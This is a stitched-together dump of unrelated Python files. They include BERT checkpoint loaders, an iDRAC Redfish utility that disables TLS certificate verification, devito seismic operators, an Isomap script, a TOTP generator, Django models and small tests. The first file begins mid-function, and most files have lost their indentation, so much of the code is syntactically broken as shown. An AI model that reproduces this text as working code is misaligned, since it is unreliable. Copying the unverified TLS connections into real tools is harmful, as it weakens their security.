d.library_classes[common_section].add(component("TEST.inf"))
        # NEXTVER: once the adding logic is implemented, this will need to be redone
with self.assertRaises(ValueError):
d.library_classes[common_section] = set()
# now to check the components
d.components[common_section] = set()
with self.assertRaises(ValueError):
d.components[build_opt_section] = set()
with self.assertRaises(ValueError):
d.components[common_section].add(library_class("TEST", "TEST.inf"))
        # NEXTVER: once the adding logic is implemented, this will need to be redone
with self.assertRaises(ValueError):
d.components[common_section] = set()
@staticmethod
def create_dsc_object():
# Normally we would just read the dsc object
d = dsc()
# first add the defines
d.defines.add(definition("PLATFORM_NAME", "TEST"))
d.defines.add(definition("PLATFORM_GUID", "EB216561-961F-47EE-9EF9-CA426EF547C2"))
d.defines.add(definition("OUTPUT_DIRECTORY", "Build/TEST"))
d.defines.add(definition("SUPPORTED_ARCHITECTURES", "IA32 X64 AARCH64"))
# Next add some library classes
default_section = dsc_section_type()
d.library_classes[default_section].add(library_class("NULL", "BOB.inf"))
# Next add a component
return d
|
StarcoderdataPython
|
9756049
|
from tensorflow.python.training import py_checkpoint_reader
import tensorflow as tf
##reload the model weights from checkpoints since the model structure is changed due to modified code in /official
def load_tf2_weights_emb(tf2_checkpoint, embedding_model):
reader = tf.train.load_checkpoint(tf2_checkpoint)
embedding_model.set_weights([
reader.get_tensor(
'model/bert/embeddings/weight/.ATTRIBUTES/VARIABLE_VALUE')
])
return embedding_model
def load_tf1_weights_emb(tf1_checkpoint, embedding_model):
reader = py_checkpoint_reader.NewCheckpointReader(tf1_checkpoint)
embedding_model.set_weights(
[reader.get_tensor('bert/embeddings/word_embeddings')])
return embedding_model
def load_tf2_weights_cls(tf2_checkpoint, decoder_model):
reader = tf.train.load_checkpoint(tf2_checkpoint)
tf2_cls_name_lst = [
'model/classifier/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/classifier/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
decoder_model.layers[-1].set_weights(
[reader.get_tensor(n) for n in tf2_cls_name_lst])
def load_tf1_weights_cls(tf1_checkpoint, decoder_model):
reader = py_checkpoint_reader.NewCheckpointReader(tf1_checkpoint)
tf2_cls_name_dict = {}
tf2_cls_name_dict[-1] = [
'cls/predictions/transform/dense/kernel',
'cls/predictions/transform/dense/bias',
'cls/predictions/transform/LayerNorm/gamma',
'cls/predictions/transform/LayerNorm/beta',
'cls/predictions/output_bias'
]
decoder_model.layers[-1].set_weights(
[reader.get_tensor(n) for n in tf2_cls_name_dict[-1]])
def load_tf2_weights_core(tf2_checkpoint, core_model, num_layer):
reader = tf.train.load_checkpoint(tf2_checkpoint)
layer_name_lst = [(i, e.name) for i, e in enumerate(core_model.layers)]
tf2_core_name_dict = {}
def locate_index(substring, exclude=None):
for i, e in layer_name_lst:
if exclude:
flag = substring in e and exclude not in e
else:
flag = substring in e
if flag:
# print(substring, e)
return i
# tf2_core_name_dict[1] = ['bert/embeddings/word_embeddings']
tf2_core_name_dict[locate_index('position_embedding')] = [
'model/bert/embeddings/embeddings/.ATTRIBUTES/VARIABLE_VALUE'
]
tf2_core_name_dict[locate_index('type_embeddings')] = [
'model/bert/embeddings/token_type_embeddings/.ATTRIBUTES/VARIABLE_VALUE'
]
tf2_core_name_dict[locate_index('embeddings/layer_norm')] = [
'model/bert/embeddings/LayerNorm/gamma/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/embeddings/LayerNorm/beta/.ATTRIBUTES/VARIABLE_VALUE'
]
attn = [
'model/bert/encoder/layer/{}/attention/self_attention/query/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/query/bias/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/key/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/key/bias/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/value/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/self_attention/value/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
attn_output = [
'model/bert/encoder/layer/{}/attention/dense_output/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/dense_output/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
attn_output_norm = [
'model/bert/encoder/layer/{}/attention/dense_output/LayerNorm/gamma/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/attention/dense_output/LayerNorm/beta/.ATTRIBUTES/VARIABLE_VALUE'
]
inte = [
'model/bert/encoder/layer/{}/intermediate/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/intermediate/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
output = [
'model/bert/encoder/layer/{}/bert_output/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/bert_output/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
output_norm = [
'model/bert/encoder/layer/{}/bert_output/LayerNorm/gamma/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/encoder/layer/{}/bert_output/LayerNorm/beta/.ATTRIBUTES/VARIABLE_VALUE'
]
tf2_core_name_dict[locate_index('pooler_transform')] = [
'model/bert/pooler/dense/kernel/.ATTRIBUTES/VARIABLE_VALUE',
'model/bert/pooler/dense/bias/.ATTRIBUTES/VARIABLE_VALUE'
]
for l in range(num_layer):
tf2_core_name_dict[locate_index(
'self_attention_{}'.format(l))] = [s.format(l) for s in attn]
tf2_core_name_dict[locate_index(
'self_attention_output_{}'.format(l))] = [
s.format(l) for s in attn_output
]
tf2_core_name_dict[locate_index(
'self_attention_layer_norm_{}'.format(l))] = [
s.format(l) for s in attn_output_norm
]
tf2_core_name_dict[locate_index(
'intermediate_{}'.format(l))] = [s.format(l) for s in inte]
tf2_core_name_dict[locate_index('output_{}'.format(l), 'attention')] = [
s.format(l) for s in output
]
tf2_core_name_dict[locate_index('output_layer_norm_{}'.format(l))] = [
s.format(l) for s in output_norm
]
for a in tf2_core_name_dict:
weight_shapes = [w.shape for w in core_model.layers[a].weights]
core_model.layers[a].set_weights([
reader.get_tensor(n).reshape(s)
for (n, s) in zip(tf2_core_name_dict[a], weight_shapes)
])
def load_tf1_weights_core(tf1_checkpoint, core_model, num_layer):
reader = py_checkpoint_reader.NewCheckpointReader(tf1_checkpoint)
layer_name_lst = [(i, e.name) for i, e in enumerate(core_model.layers)]
def locate_index(substring, exclude=None):
for i, e in layer_name_lst:
if exclude:
flag = substring in e and exclude not in e
else:
flag = substring in e
if flag:
return i
tf2_core_name_dict = {}
tf2_core_name_dict[locate_index('position_embedding')] = [
'bert/embeddings/position_embeddings'
]
tf2_core_name_dict[locate_index('type_embeddings')] = [
'bert/embeddings/token_type_embeddings'
]
tf2_core_name_dict[locate_index('embeddings/layer_norm')] = [
'bert/embeddings/LayerNorm/gamma', 'bert/embeddings/LayerNorm/beta'
]
attn = [
'bert/encoder/layer_{}/attention/self/query/kernel',
'bert/encoder/layer_{}/attention/self/query/bias',
'bert/encoder/layer_{}/attention/self/key/kernel',
'bert/encoder/layer_{}/attention/self/key/bias',
'bert/encoder/layer_{}/attention/self/value/kernel',
'bert/encoder/layer_{}/attention/self/value/bias'
]
attn_output = [
'bert/encoder/layer_{}/attention/output/dense/kernel',
'bert/encoder/layer_{}/attention/output/dense/bias'
]
attn_output_norm = [
'bert/encoder/layer_{}/attention/output/LayerNorm/gamma',
'bert/encoder/layer_{}/attention/output/LayerNorm/beta'
]
inte = [
'bert/encoder/layer_{}/intermediate/dense/kernel',
'bert/encoder/layer_{}/intermediate/dense/bias'
]
output = [
'bert/encoder/layer_{}/output/dense/kernel',
'bert/encoder/layer_{}/output/dense/bias'
]
output_norm = [
'bert/encoder/layer_{}/output/LayerNorm/gamma',
'bert/encoder/layer_{}/output/LayerNorm/beta'
]
for l in range(num_layer):
tf2_core_name_dict[locate_index(
'self_attention_{}'.format(l))] = [s.format(l) for s in attn]
tf2_core_name_dict[locate_index(
'self_attention_output_{}'.format(l))] = [
s.format(l) for s in attn_output
]
tf2_core_name_dict[locate_index(
'self_attention_layer_norm_{}'.format(l))] = [
s.format(l) for s in attn_output_norm
]
tf2_core_name_dict[locate_index(
'intermediate_{}'.format(l))] = [s.format(l) for s in inte]
tf2_core_name_dict[locate_index('output_{}'.format(l), 'attention')] = [
s.format(l) for s in output
]
tf2_core_name_dict[locate_index('output_layer_norm_{}'.format(l))] = [
s.format(l) for s in output_norm
]
for a in tf2_core_name_dict:
weight_shapes = [w.shape for w in core_model.layers[a].weights]
core_model.layers[a].set_weights([
reader.get_tensor(n).reshape(s)
for (n, s) in zip(tf2_core_name_dict[a], weight_shapes)
])
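# Hedged helper (not part of the original file): when the hard-coded name maps
# above do not line up with a given checkpoint, listing its variables is the
# quickest way to debug. The checkpoint path is whatever the caller supplies.
def list_checkpoint_variables(checkpoint_path):
    """Print every variable name and shape stored in a TF checkpoint."""
    reader = py_checkpoint_reader.NewCheckpointReader(checkpoint_path)
    for name, shape in sorted(reader.get_variable_to_shape_map().items()):
        print(name, shape)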
|
StarcoderdataPython
|
5081994
|
import ipaddress
import getpass
import json
import logging
import os
import re
import requests
import sys
import time
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib3.exceptions import InsecureRequestWarning
def create_dir(directory):
"""
create directory recursively
"""
try:
os.makedirs(directory)
logging.info('successfully created directory {}'.format(directory))
except OSError:
logging.error('creating directory {} failed'.format(directory))
def check_path(path, isfile=False, isdir=False):
"""
returns if path given is a file or directory
"""
return os.path.isfile(path) if isfile else os.path.isdir(path)
def set_values(user_input, default, check=''):
"""
sets default value if user input is empty value.
ensures integer value if necessary
"""
if check == 'integer' and user_input != '':
user_input = check_user_input_if_integer(user_input)
return default if not user_input else user_input
def validate_url(url):
"""
validates url and checks if any HTTP Errors
"""
url_verify = ''
try:
url_verify = urlopen(url)
except HTTPError:
logging.error('URL {} - HTTP Error'.format(url))
return url_verify
def check_user_input_if_integer(user_input):
"""
check if user input is integer and not any other data type
"""
integer_input = ''
while not integer_input:
try:
integer_input = int(user_input)
except ValueError:
logging.warn('only integer number accepted')
user_input = input('enter a number: ')
return integer_input
def get_ip(node_name='', ip_type=''):
"""
get the ip address of a node
"""
ip = ''
while True:
ip = input('ip address for {} in {} node: '.format(ip_type, node_name))
ip_check = validate_ip(ip)
if ip_check:
break
else:
logging.warn('ip address should be in format: x.x.x.x')
return ip
def validate_ip(ip):
"""
validates ip address format
"""
valid_ip = ''
try:
valid_ip = ipaddress.ip_address(ip)
except ValueError:
logging.error('ip address \'{}\' is not valid: '.format(ip))
return valid_ip
def validate_port(port):
"""
validate ports to ensure HAProxy ports are not reused
"""
invalid_ports = [80, 443, 6443, 22623]
while True:
try:
check_for_string = port.isdigit()
if not check_for_string:
logging.warn('port has to be an integer')
else:
invalid_ports.index(int(port))
logging.warn('ports {} are not allowed'.format(invalid_ports))
port = input('enter a port: ')
except AttributeError:
break
except ValueError:
break
return port
def validate_network_cidr(network_cidr):
"""
validate ip address with cidr format. defaults to /24 if only IP is given
"""
compressed_network_cidr = ''
while True:
try:
compressed_network_cidr = ipaddress.ip_network(network_cidr)
break
except ValueError:
logging.warn('input should be in format x.x.x.x/x')
network_cidr = input('enter the network cidr: ')
return compressed_network_cidr.compressed
def validate_cidr(cidr):
"""
validates subnet in cidr format.
"""
check_integer = ''
while not check_integer:
check_integer = check_user_input_if_integer(cidr)
if check_integer and check_integer < 32:
pass
else:
cidr = input('user input has to be an integer and less than 32: ')
return cidr
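# Illustrative examples (inputs are assumptions):
#   validate_network_cidr('192.168.1.0/24') -> '192.168.1.0/24'
#   validate_cidr(24)                       -> 24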
def connect_to_idrac(user, passwd, base_api_url):
"""
establishes connection to idrac
"""
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
response = ''
try:
response = requests.get(base_api_url, verify=False, auth=(user, passwd),
timeout=5)
except requests.exceptions.ConnectTimeout:
logging.error('failed to establish connection to base api url')
except Exception as e:
logging.error('unknown exception occurred')
logging.error('{}'.format(e))
return response
def get_network_devices(user, passwd, base_api_url):
"""
get list of network devices from iDRAC
"""
network_devices = ''
response = connect_to_idrac(user, passwd, base_api_url)
if response and response.json():
network_devices_info = response.json()
try:
network_devices = network_devices_info[u'Members']
except KeyError:
network_devices = ''
return network_devices
def generate_network_devices_menu(devices):
"""
generate a list of network devices menu obtained from iDRAC
"""
menu = {}
i = 1
choice = ''
devices.sort()
for device in devices:
menu[i] = device
i += 1
while True:
options = menu.keys()
for entry in options:
logging.info('{} -> {}'.format(entry, menu[entry]))
choice = input('Select the interface used by DHCP: ')
if choice == '1' or choice == '2' or choice == '3' or choice == '4':
break
else:
logging.warn('unknown option selected')
selected_network_device = menu[int(choice)]
logging.info('selected interface is: {}'.format(menu[int(choice)]))
return selected_network_device
def get_mac_address(selected_network_device, base_api_url, user, passwd):
"""
get mac address for a selected network device
"""
url = '{}/{}'.format(base_api_url, selected_network_device)
    device_mac_address = ''
    try:
        response = requests.get(url, verify=False, auth=(user, passwd),
                                timeout=5)
    except requests.exceptions.ConnectTimeout:
        logging.error('failed to establish connection to get mac address')
        return device_mac_address
    try:
        network_device_info = response.json()
    except ValueError:
        logging.error('check URL, iDRAC user and password may be invalid')
        logging.info('{}'.format(url))
        return device_mac_address
    try:
        device_mac_address = network_device_info[u'MACAddress']
    except KeyError:
        logging.error('No MAC Address found for network devices')
        logging.info('{}'.format(selected_network_device))
    return device_mac_address
def get_network_device_mac(node_name='', ip_type=''):
"""
lists available network devices from iDRAC
generates a menu of network devices
obtains mac address for the network device
"""
devices = []
network_device_mac_address = ''
ip = get_ip(node_name=node_name, ip_type=ip_type)
user = input('enter the idrac user for {}: '.format(node_name))
passwd = getpass.getpass('enter idrac password for {}: '.format(node_name))
base_api_url = 'https://{}/redfish/v1/Systems/System.Embedded.1/EthernetInterfaces'.format(ip)
network_devices = get_network_devices(user, passwd, base_api_url)
if network_devices:
for network_device in network_devices:
device = list(map(lambda interface: interface.encode('ascii'), network_device.values()))
try:
devices.append(device[0].decode("utf-8").split('/')[-1])
except IndexError:
logging.error('Did not find any network devices')
if devices:
selected_network_device = generate_network_devices_menu(devices)
network_device_mac_address = get_mac_address(selected_network_device, base_api_url, user, passwd)
if network_device_mac_address:
logging.info('device {} mac address is {}'.format(selected_network_device, network_device_mac_address))
return network_device_mac_address
def main():
pass
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
304832
|
<gh_stars>0
import pytest
from zetemple import zetemple
@pytest.fixture
def item_source():
hosts = [{'name': 'host1', 'prefix': 'PREFIX1:'},
{'name': 'host2', 'prefix': 'PREFIX2:'}]
item_keys = ['zetemple.key1', 'zetemple.comma.KEY2', 'invalid.key']
interval = 180
func = 'ave'
items = [
{'host': 'host1', 'item_key': 'zetemple.key1',
'pv': 'PREFIX1:key1'},
{'host': 'host1', 'item_key': 'zetemple.comma.KEY2',
'pv': 'PREFIX1:KEY2'},
{'host': 'host2', 'item_key': 'zetemple.key1',
'pv': 'PREFIX2:key1'},
{'host': 'host2', 'item_key': 'zetemple.comma.KEY2',
'pv': 'PREFIX2:KEY2'},
]
for item in items:
item['func'] = func
item['interval'] = interval
source = {'hosts': hosts, 'item_keys': item_keys,
'interval': interval, 'func': func,
'items': items}
return source
def test_create_items(item_source):
hosts = item_source['hosts']
item_keys = item_source['item_keys']
interval = item_source['interval']
func = item_source['func']
items = zetemple.create_items(hosts, item_keys, interval, func)
assert items == item_source['items']
@pytest.mark.parametrize('key,pvname', [
('zetemple.key1', 'key1'),
('zetemple.comma.KEY2', 'KEY2'),
('zetemple.comma.pv.KEY.FIELD', 'KEY.FIELD'),
('zetemple.comma.pv', 'pv'),
('ZETEMPLE.comma.pv', 'pv'),
('key1', None)
])
def test_parse_item_key(key, pvname):
_pvname = zetemple.__parse_item_key(key)
assert pvname == _pvname
|
StarcoderdataPython
|
5024647
|
<reponame>jrt54/devito<filename>examples/seismic/elastic/operators.py<gh_stars>1-10
from devito import Eq, Operator, TimeFunction, NODE
from examples.seismic import PointSource, Receiver
def stress_fields(model, save, space_order):
"""
Create the TimeFunction objects for the stress fields in the elastic formulation.
"""
if model.grid.dim == 2:
x, z = model.space_dimensions
stagg_xx = stagg_zz = NODE
stagg_xz = (x, z)
# Create symbols for forward wavefield, source and receivers
txx = TimeFunction(name='txx', grid=model.grid, staggered=stagg_xx, save=save,
time_order=1, space_order=space_order)
tzz = TimeFunction(name='tzz', grid=model.grid, staggered=stagg_zz, save=save,
time_order=1, space_order=space_order)
txz = TimeFunction(name='txz', grid=model.grid, staggered=stagg_xz, save=save,
time_order=1, space_order=space_order)
tyy = txy = tyz = None
elif model.grid.dim == 3:
x, y, z = model.space_dimensions
stagg_xx = stagg_yy = stagg_zz = NODE
stagg_xz = (x, z)
stagg_yz = (y, z)
stagg_xy = (x, y)
# Create symbols for forward wavefield, source and receivers
txx = TimeFunction(name='txx', grid=model.grid, staggered=stagg_xx, save=save,
time_order=1, space_order=space_order)
tzz = TimeFunction(name='tzz', grid=model.grid, staggered=stagg_zz, save=save,
time_order=1, space_order=space_order)
tyy = TimeFunction(name='tyy', grid=model.grid, staggered=stagg_yy, save=save,
time_order=1, space_order=space_order)
txz = TimeFunction(name='txz', grid=model.grid, staggered=stagg_xz, save=save,
time_order=1, space_order=space_order)
txy = TimeFunction(name='txy', grid=model.grid, staggered=stagg_xy, save=save,
time_order=1, space_order=space_order)
tyz = TimeFunction(name='tyz', grid=model.grid, staggered=stagg_yz, save=save,
time_order=1, space_order=space_order)
return txx, tyy, tzz, txy, txz, tyz
def particle_velocity_fields(model, save, space_order):
"""
Create the particle velocity fields
"""
if model.grid.dim == 2:
x, z = model.space_dimensions
stagg_x = x
stagg_z = z
# Create symbols for forward wavefield, source and receivers
vx = TimeFunction(name='vx', grid=model.grid, staggered=stagg_x,
time_order=1, space_order=space_order)
vz = TimeFunction(name='vz', grid=model.grid, staggered=stagg_z,
time_order=1, space_order=space_order)
vy = None
elif model.grid.dim == 3:
x, y, z = model.space_dimensions
stagg_x = x
stagg_y = y
stagg_z = z
# Create symbols for forward wavefield, source and receivers
vx = TimeFunction(name='vx', grid=model.grid, staggered=stagg_x,
time_order=1, space_order=space_order)
vy = TimeFunction(name='vy', grid=model.grid, staggered=stagg_y,
time_order=1, space_order=space_order)
vz = TimeFunction(name='vz', grid=model.grid, staggered=stagg_z,
time_order=1, space_order=space_order)
return vx, vy, vz
def elastic_2d(model, space_order, save, geometry):
"""
2D elastic wave equation FD kernel
"""
vp, vs, rho, damp = model.vp, model.vs, model.rho, model.damp
s = model.grid.stepping_dim.spacing
cp2 = vp*vp
cs2 = vs*vs
ro = 1/rho
mu = cs2*rho
l = rho*(cp2 - 2*cs2)
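    # ro is the buoyancy (1/density), mu the shear modulus rho*vs^2 and l Lame's
    # first parameter rho*(vp^2 - 2*vs^2): the standard isotropic elastic moduli
    # written in terms of the P- and S-wave velocities.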
# Create symbols for forward wavefield, source and receivers
vx, vy, vz = particle_velocity_fields(model, save, space_order)
txx, tyy, tzz, _, txz, _ = stress_fields(model, save, space_order)
# Stencils
u_vx = Eq(vx.forward, damp * vx - damp * s * ro * (txx.dx + txz.dy))
u_vz = Eq(vz.forward, damp * vz - damp * ro * s * (txz.dx + tzz.dy))
u_txx = Eq(txx.forward, damp * txx - damp * (l + 2 * mu) * s * vx.forward.dx
- damp * l * s * vz.forward.dy)
u_tzz = Eq(tzz.forward, damp * tzz - damp * (l+2*mu)*s * vz.forward.dy
- damp * l * s * vx.forward.dx)
u_txz = Eq(txz.forward, damp * txz - damp * mu*s * (vx.forward.dy + vz.forward.dx))
src_rec_expr = src_rec(vx, vy, vz, txx, tyy, tzz, model, geometry)
return [u_vx, u_vz, u_txx, u_tzz, u_txz] + src_rec_expr
def elastic_3d(model, space_order, save, geometry):
"""
3D elastic wave equation FD kernel
"""
vp, vs, rho, damp = model.vp, model.vs, model.rho, model.damp
s = model.grid.stepping_dim.spacing
cp2 = vp*vp
cs2 = vs*vs
ro = 1/rho
mu = cs2*rho
l = rho*(cp2 - 2*cs2)
# Create symbols for forward wavefield, source and receivers
vx, vy, vz = particle_velocity_fields(model, save, space_order)
txx, tyy, tzz, txy, txz, tyz = stress_fields(model, save, space_order)
# Stencils
u_vx = Eq(vx.forward, damp * vx - damp * s * ro * (txx.dx + txy.dy + txz.dz))
u_vy = Eq(vy.forward, damp * vy - damp * s * ro * (txy.dx + tyy.dy + tyz.dz))
u_vz = Eq(vz.forward, damp * vz - damp * s * ro * (txz.dx + tyz.dy + tzz.dz))
u_txx = Eq(txx.forward, damp * txx - damp * (l + 2 * mu) * s * vx.forward.dx
- damp * l * s * (vy.forward.dy + vz.forward.dz))
u_tyy = Eq(tyy.forward, damp * tyy - damp * (l + 2 * mu) * s * vy.forward.dy
- damp * l * s * (vx.forward.dx + vz.forward.dz))
u_tzz = Eq(tzz.forward, damp * tzz - damp * (l+2*mu)*s * vz.forward.dz
- damp * l * s * (vx.forward.dx + vy.forward.dy))
u_txz = Eq(txz.forward, damp * txz - damp * mu * s * (vx.forward.dz + vz.forward.dx))
u_txy = Eq(txy.forward, damp * txy - damp * mu * s * (vy.forward.dx + vx.forward.dy))
u_tyz = Eq(tyz.forward, damp * tyz - damp * mu * s * (vy.forward.dz + vz.forward.dy))
src_rec_expr = src_rec(vx, vy, vz, txx, tyy, tzz, model, geometry)
return [u_vx, u_vy, u_vz, u_txx, u_tyy, u_tzz, u_txz, u_txy, u_tyz] + src_rec_expr
def src_rec(vx, vy, vz, txx, tyy, tzz, model, geometry):
"""
Source injection and receiver interpolation
"""
s = model.grid.time_dim.spacing
# Source symbol with input wavelet
src = PointSource(name='src', grid=model.grid, time_range=geometry.time_axis,
npoint=geometry.nsrc)
rec1 = Receiver(name='rec1', grid=model.grid, time_range=geometry.time_axis,
npoint=geometry.nrec)
rec2 = Receiver(name='rec2', grid=model.grid, time_range=geometry.time_axis,
npoint=geometry.nrec)
# The source injection term
src_xx = src.inject(field=txx.forward, expr=src * s)
src_zz = src.inject(field=tzz.forward, expr=src * s)
src_expr = src_xx + src_zz
if model.grid.dim == 3:
src_yy = src.inject(field=tyy.forward, expr=src * s)
src_expr += src_yy
# Create interpolation expression for receivers
rec_term1 = rec1.interpolate(expr=tzz)
if model.grid.dim == 2:
rec_expr = vx.dx + vz.dy
else:
rec_expr = vx.dx + vy.dy + vz.dz
rec_term2 = rec2.interpolate(expr=rec_expr)
return src_expr + rec_term1 + rec_term2
def ForwardOperator(model, geometry, space_order=4, save=False, **kwargs):
"""
Construct method for the forward modelling operator in an elastic media.
Parameters
----------
model : Model
Object containing the physical parameters.
geometry : AcquisitionGeometry
Geometry object that contains the source (SparseTimeFunction) and
receivers (SparseTimeFunction) and their position.
space_order : int, optional
Space discretization order.
save : int or Buffer
Saving flag, True saves all time steps, False saves three buffered
indices (last three time steps). Defaults to False.
"""
wave = kernels[model.grid.dim]
pde = wave(model, space_order, geometry.nt if save else None, geometry)
# Substitute spacing terms to reduce flops
return Operator(pde, subs=model.spacing_map,
name='Forward', **kwargs)
kernels = {3: elastic_3d, 2: elastic_2d}
|
StarcoderdataPython
|
8035094
|
import numpy as np
import matplotlib.pyplot as plt
import sys
import sklearn.linear_model
import sklearn.utils.graph
import sklearn.decomposition
DISTANCE = "D1"
SUBTRACT_BIAS = True
THRESHOLD_OUT_OF_MAX = 0.5
distance_file = DISTANCE + ".npy"
try:
D = np.load(distance_file)
except IOError:
print("Distance file not found (%s). Try running compute_distances.py."%(distance_file))
sys.exit(1)
print("Checking if metric is consistent and computing its bias.")
nearest_distances = np.diagonal(D[1:,:-1])
second_nearest_distances = np.diagonal(D[2:,:-2])
sum_of_nearest_distances = nearest_distances[1:] + nearest_distances[:-1]
plt.subplot(221)
plt.scatter(second_nearest_distances, sum_of_nearest_distances, color="b", marker=".", label="data")
#fit a line via RANdom SAmple Consensus
ransac = sklearn.linear_model.RANSACRegressor()
ransac.fit(second_nearest_distances.reshape(-1, 1), sum_of_nearest_distances)
distances_extent = np.array([[0], [np.max(second_nearest_distances)]])
ransac_extent_fit = ransac.predict(distances_extent)
line_slope = (ransac_extent_fit[1]-ransac_extent_fit[0])/(distances_extent[1] - distances_extent[0])
bias = ransac_extent_fit[0]
print("Slope of metric consistensy test is %.2f (should be close to 1)"%(line_slope))
print("Metrix bias estimate is %.2e"%(bias))
plt.plot(distances_extent, ransac_extent_fit, color="k", label="linear fit")
plt.plot(distances_extent, distances_extent, color="r", ls="--", label="slope of 1")
plt.ticklabel_format(style="sci", scilimits=(0,0))
plt.ylim((0,None))
plt.xlabel("D[i,i+2]")
plt.ylabel("D[i,i+1] + D[i+1,i+2]")
plt.legend(loc=2)
if SUBTRACT_BIAS:
print("Substracting bias from all distances.")
debiased_D = (D-bias)*(D>bias)
else:
debiased_D = D
threshold = THRESHOLD_OUT_OF_MAX*np.max(D)
print("Discarding distances above %.2e and running Isomaps"%(threshold))
isomaps_D = debiased_D*(debiased_D<threshold)
geodesic_D = sklearn.utils.graph.graph_shortest_path(isomaps_D)
kernel_pca = sklearn.decomposition.KernelPCA(n_components=2, kernel="precomputed")
isomaps_coordinates = kernel_pca.fit_transform(-0.5*geodesic_D**2)
x = isomaps_coordinates[:,0]
y = isomaps_coordinates[:,1]
plt.subplot(222)
plt.title("Isomaps fit")
plt.plot(x, y, color="k")
print("Mapping Isomaps coordinates to angle")
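# Algebraic least-squares circle fit: solving the 3x3 normal equations below gives
# the circle centre (center_x, center_y); the third unknown (related to the radius)
# is discarded.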
center_x, center_y, _ = np.linalg.solve(
    [[np.sum(x**2), np.sum(x*y), np.sum(x)],
     [np.sum(x*y), np.sum(y**2), np.sum(y)],
     [np.sum(x), np.sum(y), len(x)]],
    [0.5*np.sum(x*(x**2 + y**2)), 0.5*np.sum(y*(x**2 + y**2)), 0.5*np.sum(x**2 + y**2)])
angles = np.unwrap(np.arctan2(y-center_y, x-center_x))
plt.scatter([center_x], [center_y], marker="x", color="r")
plt.ticklabel_format(style="sci", scilimits=(0,0))
plt.subplot(223)
plt.title("Resulting angles")
plt.plot(np.degrees(angles), color="k")
plt.xlabel("frame number")
plt.ylabel("angle [deg]")
plt.subplot(224)
plt.title("Resulting angle increments")
plt.plot(np.degrees(angles[1:]-angles[:-1]), color="k")
plt.xlabel("frame number")
plt.ylabel("angle [deg]")
plt.tight_layout()
plt.show()
|
StarcoderdataPython
|
183761
|
# -*- coding: utf-8 -*-
"""
@author: <EMAIL>
@site: e-smartdata.org
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
df = pd.read_csv('./data/ten_d.csv', index_col=0)
df.columns = ['Open', 'High', 'Low', 'Close', 'Volume']
clean_price = df[['Open', 'High', 'Low', 'Close']]
# %%
corr_matrix = clean_price.corr().round(2)
# %% corr between Series
df['Open'].corr(df['Close'])
# %% plot correlation matrix
plt.matshow(clean_price.corr())
# %% using seaborn
sns.heatmap(corr_matrix,
xticklabels=corr_matrix.columns.values,
yticklabels=corr_matrix.columns.values)
|
StarcoderdataPython
|
11220916
|
"""
@author: magician
@date: 2019/12/18
@file: palindrome.py
"""
def is_palindrome(x: int) -> bool:
"""
is_palindrome
:param x:
:return:
"""
return bool(str(x) == str(x)[::-1])
if __name__ == '__main__':
assert is_palindrome(121) is True
|
StarcoderdataPython
|
9770160
|
<reponame>WIM-TRD/Avanza<filename>avanza4java/src/main/java/org/avanza4java/Utils/totp/getTotp.py<gh_stars>0
import argparse
import mintotp
import sys
description = """Script to generate TOTP secret for provided TOTP key """
def createTotpKey(totpKey):
return mintotp.totp(totpKey)
def main(argv):
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--totpkey", "-t", dest="totpKey", type=str, required=True)
args = parser.parse_args()
print(createTotpKey(args.totpKey))
if __name__ == "__main__": main(sys.argv)
|
StarcoderdataPython
|
5053085
|
from django.db import models
# from django.dispatch import receiver
from django.contrib.auth.models import AbstractUser
# from django.conf import settings
# from django.contrib.contenttypes.fields import GenericForeignKey
# from django.contrib.contenttypes.models import ContentType
# from rest_framework.authtoken.models import Token
# This code is triggered whenever a new user has been created and saved to the database
# @receiver(post_save, sender=settings.AUTH_USER_MODEL)
# def create_auth_token(sender, instance=None, created=False, **kwargs):
# if created:
# Token.objects.create(user=instance)
class User(AbstractUser):
'''
User info and profile
'''
# profile_picture = models.ImageField(upload_to='profile')
# location = models.idk(null=True, blank=True)
GENDER_CHOICES = (
('M', 'Male'),
('F', 'Female'),
('O', 'Other'),
)
gender = models.CharField(max_length=10, choices=GENDER_CHOICES, null=True, blank=True)
# lister fields
    helpr = models.BooleanField(default=False)  # whether this user is listing anything or is just a regular user
birthday = models.DateField(null=True, blank=True)
def __str__(self):
return self.username
class Category(models.Model):
'''
All possible categories
'''
CATEGORY_CHOICES = (
('photographer', 'photographer'),
('plumber', 'plumber'),
('landscaper', 'landscaper'),
('personal_trainer', 'personal trainer'),
('tutor', 'tutor'),
('carpenter', 'carpenter'),
('electrician', 'electrician'),
('pool_service', 'pool service'),
        ('gardener', 'gardener'),
('babysitting', 'babysitting'),
)
category = models.CharField(max_length=50, choices=CATEGORY_CHOICES, null=True, blank=True)
def __str__(self):
return self.category
class Listing(models.Model):
'''
Listing a user posts
'''
title = models.CharField(max_length=250)
user = models.ManyToManyField(User)
# profile_picture = models.ImageField(upload_to='profile')
# location = models.idk()
# images
blurb = models.TextField(max_length=500, null=True, blank=True)
# phone_number = models.PositiveIntegerField(null=True, blank=True)
# email = models.CharField(max_length=150)
website = models.CharField(max_length=150, null=True, blank=True)
category = models.ManyToManyField(Category)
